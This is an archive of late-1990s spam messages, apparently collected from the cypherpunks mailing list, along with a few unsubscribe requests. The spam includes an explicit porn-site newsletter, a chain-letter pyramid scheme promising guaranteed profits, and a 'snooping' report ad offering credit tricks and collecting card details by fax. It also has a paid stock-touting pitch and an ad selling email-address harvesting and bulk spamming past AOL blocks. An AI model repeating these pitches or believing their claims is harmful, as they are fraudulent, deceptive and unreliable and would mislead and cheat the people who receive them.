To: All Eureka! Subscribers: ;
Subject: Eureka! Sat Jan 31 '98
Message-ID: <19980131082952.17577.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Saturday's issue of Eureka!

PURE HARDCORE
For a limited time only,  Pure Hardcore is  giving away FREE
3 day memberships!  Unlimited Access to over 250 Channels of
Live  Video!  Unlimited  Access  to over  2000 Hardcore  XXX
Photos!  Unlimited Access  to over  200 Steamy  XXX Stories! 
Unlimited Access to the Live Java Chat Room!  Don't miss it!
Hard City ---> http://www.purehardcore.com/partners/H001.cgi

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Amazing Teen Cocksuckers
http://pandobox.com
Memberships include,40,000 jpg pix,over 300 live hardcore
feeds, monthly interactive porn magazine, 1 gig of movies
clips, 300 sexy stories and x-rated games to play offline.


TOKYO TOPLESS
If you think all  asian  beauties  are delicate, willowy and
lacking in the tit-based tonnage  department. Think again...
Wow! See some heavy swingers in  all their naked glory here.
Busty babes, erotic text and featured funbags. What a sight!
Tokyo Topless ............... http://www.tokyotopless.co.jp/

JABAR'S HOT PIX
Jabar's got a healthy interest  in  porn. He's got a bulging
collection of hardcore  pix  too.  Take  a  wander  thru his
galleries noting the artistry, hot chicks and flying juices.
It's easy  to use and everything comes to hand.  Believe us!
Jabar's Hot Pix ....... http://www.pornsugar.com/jabars.html

MATURE MAMA FREE MEGAPLEX
Ever sneaked a peek at Aunty Cindy  in the raw? This site is
stuffed full of those gorgeous uninhibited, sexual experts -
they're mature mamas with experienced  hands. Get your kicks
with  naked  pix  of  older  women.  Beauty  and  expertise!
Mature Mama Free Megaplex .... http://www.inpraise.com/mama/

RATED XXX
Group, lesbian and straight sex  pix  are featured here. How
do you rate your favorites? Do you like to watch lesbian sex
or get invited in.  These  pix  let  you  fantasise. The pix
links come up quickly, and  get  you  to the smut real fast.
Rated XXX ............. http://www.x-ratedpics.com/ratedxxx/

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Six free feeds --------------------> http://207.136.152.129/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
LEIGH'S WORLD: A nasty tramp who loves to polish a knob, she
loves to suck dick. This is  the girl your mother warned you
about, but she sure is  fun.  With  small, natural tits this
girl goes over the top. Stop by and take her for a spin, you
will not regret it!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
XXXStories.com: The largest free  erotic  story  site on the
net. Over 400 hot sex stories  on such topics as wife sluts,
virgins, group sex and more...... http://www.xxxstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?310
Pic  2 --------------------------> http://137.39.63.229/?311
Pic  3 --------------------------> http://137.39.63.229/?312
Pic  4 --------------------------> http://137.39.63.229/?313
Pic  5 --------------------------> http://137.39.63.229/?314
Pic  6 --------------------------> http://137.39.63.229/?315
Pic  7 --------------------------> http://137.39.63.229/?316
Pic  8 --------------------------> http://137.39.63.229/?317
Pic  9 --------------------------> http://137.39.63.229/?318
Pic 10 --------------------------> http://137.39.63.229/?319

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@hk.super.net
Date: Sun, 1 Feb 1998 00:00:30 -0800 (PST)
To: Friend@public.com
Subject: RE: THE INFORMATION YOU REQUESTED
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Hi,

About three times a week I go in and delete numerous junk e-mails from my
mailbox. Recently I decided I was going try one of these MLM "scams" just to see what would happen.  I am glad I did!!  In three weeks I have brought in $11,625, and the money keeps coming in.  I urge you to try this!!  

I have removed all of of "testimonial" text from this letter to make room for my own. 
The main thing is to read and understand the "how to part".  I have discovered a few secrets to making this thing really work, the most important being VOLUME.  The more e-mails you send out the higher % of success you will have.  

Everything below this line is what was sent to me.

                          *** Print This Now For Future Reference ***
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                       
         PRINT this letter, read the program...  THEN READ IT AGAIN !!!
This is a legitimate LEGAL money-making opportunity.  It does not require you to come 
in contact with people, do any hard work, and best of all, you never have to leave the
house, except to get the mail.  

This electronic multi-level marketing program works perfectly...100% EVERY TIME! 

             ----------------------------------------------------------------------------------
                        OVERVIEW OF THIS EXTRAORDINARY 
              ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
             ----------------------------------------------------------------------------------
The products in this program are a series of four business and financial reports costing
$5.00 each.  Each $5.00 order you receive from someone via "snail mail" will include:

  * $5.00 cash
  * The name of the report that they are ordering
  * The e-mail address of the buyer so that you can e-mail them the 
    report that they ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!... the $5.00
is yours! This is the GREATEST electronic multi-level marketing business anywhere! 

                           FOLLOW THE INSTRUCTIONS EXACTLY!
    
                         ******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below.  
     
     *  For each report send $5.00 CASH, YOUR E-MAIL ADDRESS and YOUR
        RETURN POSTAL ADDRESS (in case of a problem) to the person whose 
        name appears on the list next to the report.
  
     *  When you place your order, make sure you order each of the four
        reports.  You will need all four reports so that you can save them
        to your computer and resell them.

2.  IMPORTANT-- DO NOT alter the names of the people who are listed next 
    to each report, or their sequence on the list, in any way other that is
    instructed below in steps "a" through "d" or you will not profit from this
    program the way you should.

    a.  Look below for the listing of available reports.

    b.  Replace the name and address under REPORT #1 with yours, moving
         the one that was there down to REPORT #2.  

    c.  Move the name and address under REPORT #2 to REPORT #3.  

    d.  Move the name and address under REPORT #3 to REPORT #4.  

    e.  The name and address that was under REPORT #4 is dropped off the 
         list and is NO DOUBT on the way to the bank.

    Please make certain you copy everyone's name and address
                            ACCURATELY!!!

3.  Take this entire letter, including the modified list of names, and save 
     it to your computer.

            ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!! 
                            
          ***Order each REPORT by NUMBER and NAME***

Note 1:
ALWAYS SEND $5 CASH (and make sure that it is very well Concealed, wrap it in several layers of paper) FOR EACH REPORT. BE SURE TO REQUEST EACH SPECIFIC REPORT BY NAME AND NUMBER.

Note 2: 
ALWAYS SEND YOUR ORDER VIA FIRST CLASS  MAIL AND BE SURE TO PROVIDE YOUR E-MAIL ADDRESS
FOR QUICK DELIVERY.
_________________________________________________________________
REPORT #1 
"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 
ORDER REPORT #1 FROM:  

F & F ENTERPRISES
7708 ARGONAUT ST.
SEVERN, MD   21144
___________________________________________________________________
REPORT #2
"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"
ORDER REPORT #2 FROM:

SSB MARKETING
641 NW 2nd AVENUE
WILLISTON, FL   32696
__________________________________________________________________
REPORT #3 
"SOURCES FOR THE BEST MAILING LISTS"
ORDER REPORT #3 FROM:

P.D. BERNARD
13120 NE 120th LN C-202
KIRKLAND, WA 98034
________________________________________________________________
REPORT #4 
"EVALUATING MULTI-LEVEL SALES PLANS"
ORDER REPORT #4 FROM:

MVPNOVS
1206 W 212th STREET
TORRANCE, CA 90502
_____________________________________________________________________
         --------------------------------------------------------------------------------------------------
         HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
         --------------------------------------------------------------------------------------------------
Let's say you decide to start small just to see how it goes. Assume your goal is to get
10 people to participate on your first level. (Placing a lot of FREE ads on the internet
could EASILY get a better response.) Also assume that everyone else in YOUR BUILDING ORGANIZATION gets ONLY 10 downline members.  Follow this example for the STAGGERING results below.

1st level--your 10 members with $5......................................$50
2nd level--10 members from those 10 ($5 x 100).................$500
3rd level--10 members from those 100 ($5 x 1,000)...........$5,000
4th level--10 members from those 1,000 ($5 x 10,000).....$50,000
                                                   THIS TOTALS-----------> $55,550
                                          
                            *******TIPS FOR SUCCESS*******

 *  Send for the four reports IMMEDIATELY so you will have them when 
    the orders start coming in because:

 *  When you receive a $5 order, you MUST send out the requested
    product/report to comply with the U.S. Postal & Lottery Laws, Title
    18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. Code,
    also Code of Federal Regs. vol. 16, Sections 255 and 436, which state 
    that "a product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

                          *******YOUR SUCCESS GUIDELINE*******

You MUST receive 10 to 20 orders for REPORT #1!  THIS IS A MUST!  If you don't within two weeks, advertise more and send out more programs until you do.  Then, a couple of weeks later you should receive at least 100 orders for REPORT #2.  If you don't, advertise more and send out more programs until you do.  Once you have received 100, or more orders for REPORT #2, YOU CAN RELAX, because you will be on your way to the BANK! -OR-  You can DOUBLE your efforts!

REMEMBER: Every time your name is moved down on the list you are placed
                    in front of a DIFFERENT report.  You can KEEP TRACK of your
                    PROGRESS by watching which report people are ordering from
                    you. 
                                                IT'S THAT EASY!!!




    

</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 16632040@msn.com
Date: Sun, 1 Feb 1998 02:23:24 -0800 (PST)
To: 19888765@msn.com
Subject: ALERT - Internet Fraud and Spying
Message-ID: <this.company.is.not.endorsed.by.or.affiliated.with.msn.or.aol.or.any.other.isp>
MIME-Version: 1.0
Content-Type: text/plain



Webmaster.... This publication has been a best seller.

I thought you would like to see it.


ARE YOU BEING INVESTIGATED ?



Learn the Internet tools that are used to investigate you, your 

friends, neighbors, enemies, Employees or anyone else!  My 

huge report "SNOOPING THE INTERNET" of Internet sites 

will give you...


* Thousands of Internet locations to look up people, credit, 

Social security, current or past employment, Driving records, 

medical information, addresses, phone numbers, Maps to city 

locations...



Every day the media (television, radio, and newspapers) are 

full of stories about PERSONAL INFORMATION being used, 

traded, and sold over the Internet... usually without your 

permission or knowledge. 


With my report I show you HOW IT'S DONE!!!
	

It's amazing..

	

Locate a debtor that is hiding, or get help in finding hidden 

assets.



*   Find that old romantic interest.


*   Find e-mail, telephone or address information on just about 

     anyone! Unlisted phone numbers can often be found 

     through some of these sites!!



Perhaps you're working on a family "tree" or history. The 

Internet turns what once was years of work into hours of 

DISCOVERY & INFORMATION.




      Check birth, death, adoption or social security records.


MILITARY

      Check service records of Army, Navy, Air Force or Marine 

      Corps. Find out who's been telling the truth and who's been 

      lying. Perhaps you can uncover the next lying politician!!!
 


FELLOW EMPLOYEES;


* Find out if your fellow employee was jailed on sex charges, 

or has other "skeletons" in the closet!!



PERFORM BACKGROUND CHECKS;
  
   Check credit, driving or criminal records, Verify income or 

   educational claims, Find out Military history and discipline, 

   previous political affiliations, etc.


YOUR KID'S FRIENDS;


   Find out the background of your children's friends & dates.


WHAT'S THE LAW? STOP GUESSING!!


* Look up laws, direct from law libraries around the world. Is 

  that new business plan legal?? 


NEW JOB?  NEW TOWN?  NEW LIFE?


   Employment ads from around the world can be found on the 

   Internet. Get a new job and disappear!



The Internet can tell you just about ANYTHING, if you know 

WHERE to look. 



BONUS REPORT!!!!


Check your credit report and use the Internet to force credit 

bureaus to remove derogatory information. My special

BONUS REPORT included as part of the "SNOOPING THE 

INTERNET" collection reveals all sorts of credit tricks, legal

and for "information purposes only" some of the ILLEGAL 

tricks.


Research YOURSELF first!


What you find will scare you.


If you believe that the information that is compiled on you 

should be as easily available to you as it is to those who 

compile it, then. . .

You want to order the SNOOPING 

THE INTERNET report.


This huge report is WHERE YOU START! Once you 

locate these FREE private, college and government 

web sites, you'll find even MORE links to information 

search engines!

YOU CAN FIND OUT ANYTHING ABOUT ANYBODY 

ANY TIME using the Internet!!!!

SEVERAL WAYS TO ORDER !!!


  1) WE TAKE:  AMERICAN EXPRESS OR
    
                          VISA <> MASTERCARD
 
        TYPE OF CARD  AMX / VISA / MC??_______________

        EXPIRATION DATE   ___________________________
 
        NAME ON CREDIT CARD________________________
 
       CREDIT CARD #________________________________
 
        BILLING ADDRESS ____________________________
 
        CITY_________________________________________
 
        STATE________________ZIP_____________________
 
        PHONE INCLUDE AREA CODE___________________
 
        WE WILL BILL 39.95 to your account

        SHIPPING  COST OF 3.00 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL
 
        SALES TAX (2.90) added to CA residents 
 
  >>> Send $39.95 ($42.85 in CA) cash, check or money

order to:

  >>> CASINO CHICO
  >>> Background Investigations Division
  >>> 311 Nord Ave.
  >>> P.O. Box 4331
  >>> Chico, CA 95927-4331


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4285.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!

    
 I will RUSH back to you SAME DAY my "SNOOPING 

THE INTERNET" report!

Log on to the Internet and in moments you will fully 

understand...

 What information is available -- and exact Internet 

site to get there!

2nd BONUS!!!!


Along with the report we will send a 3 1/2" disk with 

sites already "HOT LINKED". No need to type in 

those addresses. Simply click on the URL address 

and "PRESTO" you are at the web site!!! 


Personal ads, logs of personal e-mail, mention of 

individuals anywhere on the Internet are "yours for the 

taking" with this report.


Lists of resources to find even more information 

(private Investigation companies, etc..) 


Order surveillance equipment (if legal in your state)
  

Send anonymous e-mail
   
Research companies 

Research technology

Locate military records

 
FIND INFORMATION ON CRIMINALS 

   Find Wanted fugitives - perhaps even a close 

associate!

ABSOLUTE SATISFACTION GUARANTEED:

Your satisfaction is 100% guaranteed, just return the material for
 a full refund within 30 days if you aren't 100% satisfied.

This offer is from a private company. Casino Chico / R Jon Scott Hall
 publications is not associated with or endorsed by, AOL,
MSN, or any other Internet service provider.

Copyright 1998  All Rights Reserved

R Jon Scott Hall Publications. 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gitpro@mailcity.com
Date: Mon, 16 Nov 1998 00:07:03 -0800 (PST)
To: <curt@toad.com>
Subject: Mako Capital shares to triple in next few months, projects research company
Message-ID: <199811160806.AAA27640@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Mako Capital shares to triple in next few months, projects 
research company!

Mako Capital intent to merge with Sports Group International and 
market
Spalding Sports Drinks worldwide.

OTC BB - MAKO 3/4

What do Kiki Vandeweghe, Dorothy Hamill, Joe Namath, Bill Walton, 
Larry
Holmes and Clyde Drexler all have in common? They are all 
shareholders of a
dynamic sports drink company called Sports Group International

Mako Capital

On October 19, 1998 Mako Capital made a blockbuster announcement 
that was
obviously overlooked by the investment community. Mako signed a 
letter of
intent to merge with Sports Group International. Sports Group is a 
dynamic
company with an experienced, proven management team. Sports Group 
has
revolutionary products in the multi-billion dollar sports drink 
market.
We instantly fell in love with their oxygenated water. This is 
water with
seven times the oxygen of H20. It is a big hit with marathon 
runners and we
feel that there is a huge market for this product. They also have 
newly
formulated sports drinks to satisfy every market. Sports drinks 
designed for
kids, women and bodybuilders. They also have powdered products.
The key to this company is that their sports drinks are marketed 
under the
Spalding name. Spalding is one of the most recognized names in 
sports. You
can't buy that type of name recognition. We are told that the 
company has
1.2 million cases pre-sold for 1999 which should bring in more 
than twenty
million in revenue and 15% in profit (approximately 3 million). 
That would
be better than one dollar per share in earnings. Sports Groups 
management
team is headed by Kiki Vandeweghe, the former NBA All Star and 
Dean Miller,
the star executive of Megafoods. As president of Megafoods, Dean 
saw the
company grow from a couple of stores to 70 stores and $800 million 
in
revenue.
Realizing that much of the great success behind Gatorade was the 
advertising
campaign featuring Michael Jordan, SGI has procured promotions and
endorsements from athletes who are current shareholders like, 
Clyde Drexler,
Kiki Vanderweghe, Bill Walton, Larry Holmes, Joe Namath, Dorothy 
Hamill and
others.
Mako Capital has the right combination of great products, a proven
management team and a name recognized around the world, which will 
lead them
into the next millenium. We are looking for the stock to trade $2 
- $3 short
term and $5 - $7 by summer of 1999.

For more information contact: Financial Internet Group 
800-959-9122


Disclaimer:  Mako Capital has paid Freedom Rock Partners 150,000 
shares of
free trading stock and options to purchase 100,000 shares at 
$1.00. For more
information please see our disclaimer.


NOTE: 
For those on the internet who do not want to recieve exciting 
messages such as this.....

*We strive to comply with all state and federal laws and to send 
ads only to interested parties.

*This ad is not intended for nor do we knowingly send to 
Washington State residents. 

* OR CLICK_HERE_TO_GOTO_REMOVE-LIST.COM   (http://remove-list.com)
Remove-List is a free public service offering to help the general 
public
get removed from commercial mailings lists and has not sent this 
message.
If you want their help please add your name to their list and we 
you will
not receive a commercial email from us or any other member bulk 
emailer.
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pkmrght1823@aol.com
Date: Tue, 6 Jan 1998 14:57:15 -0800 (PST)
To: pkmrt1245993@aol.com
Subject: Prodigious Sports Picks
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
     Hello, wouldn't it feel really great to know exactly who was going to win 
the NBA game between Houston Rockets at Cleveland Cavs and our 
BIG PICK in college basketball game, Kentucky at Georgia.  Well, that is
why Prodigious Picks and Associates is here.  If you have called us this past 
week, we know that you have already won big.  We have picked 15 of the last
19 games by the line, going 6-2 in the NFL playoff games and 9-2  in the last 
eleven bowl games this week.  I will inform you that we decide our picks by
using a consensus system analysis program by taking the picks of the top 
SEVEN best handicappers in the country.  We continue to prove that this
system is the best in the business.  You can't go wrong.  Don't lose your money
trying to pick the games yourself or by even calling some other handicapper 
whose price per call is much more expensive than ours.  Let us do the work and 
you get the MONEY!  So give us a call Monday and we WILL deliver!  

                                                   1-900-773-9777
                                                   Only $10 per call   
                                                  Must be 18 or older
P.S.   After you cash in on Tuesday, give us a call Wednesday for more
         basketball action. We will also be having the winning picks for the 
         AFC and NFC championship games after Friday.
        
		       

                                         

 


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: works4me@ix.netcom.com
Date: Tue, 6 Jan 1998 21:28:40 -0800 (PST)
To: Friend@public.com
Subject: Happy New Year!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


OnLineNow wishes you a Happy and Prosperous 1998.

OnLineNow World Wide Directories
http://onlinenow.net/frames/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian@HyperSoft.Net" <brian@hypersoft.net>
Date: Thu, 8 Jan 1998 06:07:16 -0800 (PST)
To: "'cypherpunks-announce@toad.com>
Subject: UNSUBSCRIBE CYPHERPUNKS-ANNOUNCE
Message-ID: <A5730D7FD897D011A59400A024B5356008B694@ntserver.4qsi.com>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBSCRIBE CYPHERPUNKS-ANNOUNCE





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "bRIAN@4qsi.com" <brian@csihost.4qsi.com>
Date: Thu, 8 Jan 1998 06:07:35 -0800 (PST)
To: cypherpunks-announce@toad.com
Subject: UNSUBSCRIBE CYPHERPUNKS-ANNOUNCE
Message-ID: <9801080907.ZM10801@csihost.4qsi.com>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBSCRIBE CYPHERPUNKS-ANNOUNCE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel K Engdahl <daniel.engdahl@abc.se>
Date: Thu, 8 Jan 1998 08:48:03 -0800 (PST)
To: cypherpunks-announce@toad.com
Subject: UNSUBSCRIBE CYPHERPUNKS-ANNOUNCE
Message-ID: <34B50322.19361078@abc.se>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBSCRIBE CYPHERPUNKS-ANNOUNCE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ole Jacobsen <olejac@post4.tele.dk>
Date: Thu, 8 Jan 1998 10:25:42 -0800 (PST)
To: "brian@csihost.4qsi.com>
Subject: Re: UNSUBSCRIBE CYPHERPUNKS-ANNOUNCE
In-Reply-To: <9801080907.ZM10801@csihost.4qsi.com>
Message-ID: <34B50B55.4F04@post4.tele.dk>
MIME-Version: 1.0
Content-Type: text/plain


bRIAN@4qsi.com wrote:
> 
> UNSUBSCRIBE CYPHERPUNKS-ANNOUNCE

remove me (olejac@post4.tele.dk or mlj@earthling.net) from the list too.

thanks, martin.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 00000@hotmail.com
Date: Sat, 10 Jan 1998 22:55:28 -0800 (PST)
To: Everyone@the.net
Subject: Make $100 everytime the phone rings!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


    ==============================================
    "Internet Marketing Warriors Secret Site!"(tm)
            Copyright 1997 by Allen Says  
    ==============================================

       " I Never Made A Dime On The Internet "
                     ..UNTIL..

                I GOT MAD AS HELL !!

"After That, I've Made Money Every Day Since And I'll Show 
     You Exactly How To Get Started Doing What I Did!"


             The Start of the Warriors!!

 One night, after a long period of NO responses to all my 
ads, I compeletly flipped out! The months of hard work with
out any rewards had reached a boiling point and I decided to 
try direct e-mail marketing! 

I grabbed a pen and wrote the words...

            THE INTERNET MARKETING WARRIORS!

 I contacted a few select people who wanted to be dealers for 
my site and overnight we started taking in 10, 20, 30 and more 
orders a day! I had found the Power of Direct E-mail!!

 Why am I telling you this?

 Because the market is unlimited AND I can guarantee you if 
you will allow me to show you just a couple secrets about 
who is "really" making money on the net, that I can also get 
YOU to making money every day...starting immediately!!

 Join the Warriors today. And if I'm wrong, you have up to a
full year to get the small membership fee back. No risk, no
questions asked!

As a member of the Warriors Secret Site and Forum
you'll learn...

# How To Create Direct Response Web Sites that Make 
  People Buy - BEFORE They Leave! 

# How to Manipulate Search Engines and Get Hundreds 
  of Hits a Day in Less than a Week! POWERFUL!!!!! 
  (one of the BEST kept secrets) 

# How to Begin Selling Hot Information People Want 
  the 'Same Day' You Get My Report! I'll show you 
  where to get all the books you want - Hundreds 
  of them! 

# Fax-on-Demand Profits are Incredible - How to Turn 
  Other Peoples Fax Machines Into Your Own Personal 
  Printers and Create Huge, Constant Profits! 

# Secrets of Bulk E-Mail! Yes, it does work - BIG TIME! 
  But, there's ways to do it and never have a problem. 
  Never lose your Internet Service and Still Make Big 
  Money Every Day! 

# How to Make $1,000's Every Week With Low Cost 
  Classified's In Weekly Newspapers Across The United 
  States! Hidden sources let you get started Now! 

# How to collect all the e-mail addresses you want from 
  the Internet - For Free! Even have them delivered to 
  your e-mail address for nothing! 

# How to create a steady stream of buyers from 1000's of 
  newsgroups! 

# Exactly how to turn 1000's of prospects into Buyers 
  and Die-Hard, Loyal Customers For Life! It's so EASY! 
  (you'll LOVE this one) 

# Seduce the Mind and Activate the Emotions of Your 
  Prospects So They Buy NOW! Killer Strategies Used By 
  The Masters of Direct Response! 

# Powerful Secrets to Multiply Yourself Over the Web 
  and Lead 1000's of People to Your Site Every Day! If 
  You Can't Make Money With This You Might Be In Trouble! 
  ...It's NOT MLM! 

    And that's just what's in the Special Report!!

Check out the Software, E-mail Addresses, Special Reports 
and Books-on-Disk I have collected over the last 3 years
that are also Inside the Warrior's Secret Site!
               	
# Over 500,000 Email addresses You Can Download Right Now! 
  Thousands more being added every week!!

# 5 Different Email Address Extractors!...one extracts 
  addresses at 60,000 per hour!

# Free Web-Based Bulk E-Mailer - Awesome! Mail Your 
  Message At Rates Up to 250,000 An Hour!!

# How to use a Free Email Address Stripper on the secret site 
  to go onto aol and collect 1000's of 'targeted' email 
  addresses from the forums, message boards and member 
  directory!! Every day...FREE!!!

# A Copy of The Special Report: How To Make At Least Make 
  $1,600 a Week Online..Starting Now! 

# Learn the Secrets of BulkMail - How to Setup a Free Email 
  Extracting and Mailing System Using Freely Available 
  Programs!!

# 38 of the 'Hottest' Marketing Reports Ever Written!!

# 6 "Must Have" Books On Disk (the "forbidden" secrets and 
  strategies of getting 1000's of customers from the net!)

# Lifetime Subscription to the "Internet Marketing Warriors 
  Letter!"...Every New Issue Posted To The Secret Site....

 You Will Also Have Lifetime Access To The Warrior Forum
  Where You Will Find Your Every Question Answered And 
       Put Your Business Light Years Ahead Of The 
                     Competition!!

              "Inside The Warrior Forum"

# How To Accept Credit Cards For Your Business..NOW! You DO 
  NOT need a merchant account. Find THE Sources That Will 
  Get You Going Today!!

# Meta Tags - How to get top listings in search engines!

# In depth talks on getting around AOL blocking!! Warriors 
  get through when no one else can!!

# In depth reviews of all major bulk mailing & extracting 
  software - Netcontact, Floodgate, Stealth (all versions), 
  E-Mail Magnet, Extractor Pro and more - Find out the truth 
  BEFORE you buy!(Honest Reviews - Not by sellers - but by 
  actual buyers & users!)

# Access to one of our members bulk emailing support site...
  tons of free features, value and help!!

# Members who will submit your site to hundreds of search 
  engines for free...just because you are a Warrior!!

# Discover the secrets and power of CGI/PERL in bulk 
  mailing!!

# More Secrets about Autoresponders!!

# Killer Headlines & Sales Advice!!

# How to print your own money....legally!!

# Tricks to cut down on flames!! One dealer is making a ton 
  of money using this trick and gets very few flames!!

# Softsell vs. Hardsell....Which works best?

# Make Every Ad of Yours a Success!!

# Bulk Email Myth #1....

# Part 1: Copywriting Secrets! Part 2: Copywriting Secrets!

# Avoid this disaster when bulk mailing!!

# Sources for the latest bulk email accounts!!

# Some members are forming bulk e-mail co-ops and partner 
  groups right now!!

     Need to hear from other Warriors?

Allen, 
This is absolutely unbelievable. Within two days I 
have already made in excess of $200.00 and it only 
took about 2 hours to do every thing. The marketing 
reports that you supply are absolutely outstanding!!  
I have to say....my hat goes off to you. I am glad 
that there is someone out there who will give your 
moneys worth and a whole lot more!!
Thanks a Million,
J.R. (Florida)

Hi Allen,
Just a quick thank you note for creating the Warrior 
site. After a full two years of banging my head 
against the monitor screen, trying to make money on 
the internet, I finally have learned the secrets that 
I needed to make it all happen. Sponsoring people into 
my MLM program has never been easier and I don't worry 
anymore about losing my internet connection for sending 
bulk e-mail.  The contacts I have made in the forum 
have turned into pure gold and will continue to further 
educate me in the proper methods of internet marketing.  
Keep up the great work Allen!
Best Regards,
John Corbett
J&D Marketing

"I have been marketing online for a while now and I 
have more than tripled my former income working at my 
job (I have been fulltime in internet marketing for 
about 6 months now) and I only work around 15 to 20 
hours a week. During my time in this business I have 
been in contact with most of the major marketers online 
and I recommend Allen Says as the most honest and helpful 
individual I have dealt with in this business. His 
Marketing package is the best value on theinternet. 
Anyone who is thinking about doing any type of business 
on the web needs to be a member of the Internet Marketing 
Warriors."
Thank You, 
Terry Dean

Thanks for your kindness, and you can quote me on 
this: a veritable treasure-trove of money making 
ideas, the package has saved me hundreds of hours 
of research time. It is well worth joining! 
Regards,
Haider Aziz 

Allen -
This is the best $25 I ever spent. Thanks for the 
honesty & quality web site.
- Steve Traino

Allen
Joining the Internet Marketing Warrior family has 
been very rewarding to me. Prior to becoming a member, 
I wasted so much time on the net unsuccessfully 
finding the kind of information & internet marketing 
techniques that are available to me now as a Warrior 
member. In addition to all the money making information 
on the private site, what amazes me the most is the great 
contribution of information & help provided to everyone 
by top gun professional fellow Warrior members on the 
forum. I recommend this site to anyone serious about 
making money on the net.
Best of Success,
Alan Alvarez
President
South Pointe Financial Corp.

.."Started reading your report last night and..COULDN'T 
PUT IT DOWN! I got so caught up in it I didn't eat supper. 
It's jam-packed with over a dozen tried and true MONEY 
MAKING techniques! I also like the fact that you really 
care about your clients and are willing to talk and answer 
questions..refreshing in the vast world of cyberspace! If 
you Email Allen, he gets back with ya!" 
Sid Menough 
Florida 
-------
                  Join Us Today!
                       ***

         Only $24.95 For A Limited Time!!
               LIFETIME MEMBERSHIP!
       Full One Year Money-Back Guarantee!
                    Order Now!

The Complete Internet Marketing Warrior Package Is 
Availiable For Immediate Download At The Warrior's 
                  Private Site!

            Fast 24 Hour Ordering by 
      Direct Fax Order Line: 1-903-838-5534

     You'll Get Your Login Info The Same Day...
            Sometimes Within Minutes!

        ---------------------------------
         Warrior's Membership Order Form
        ---------------------------------

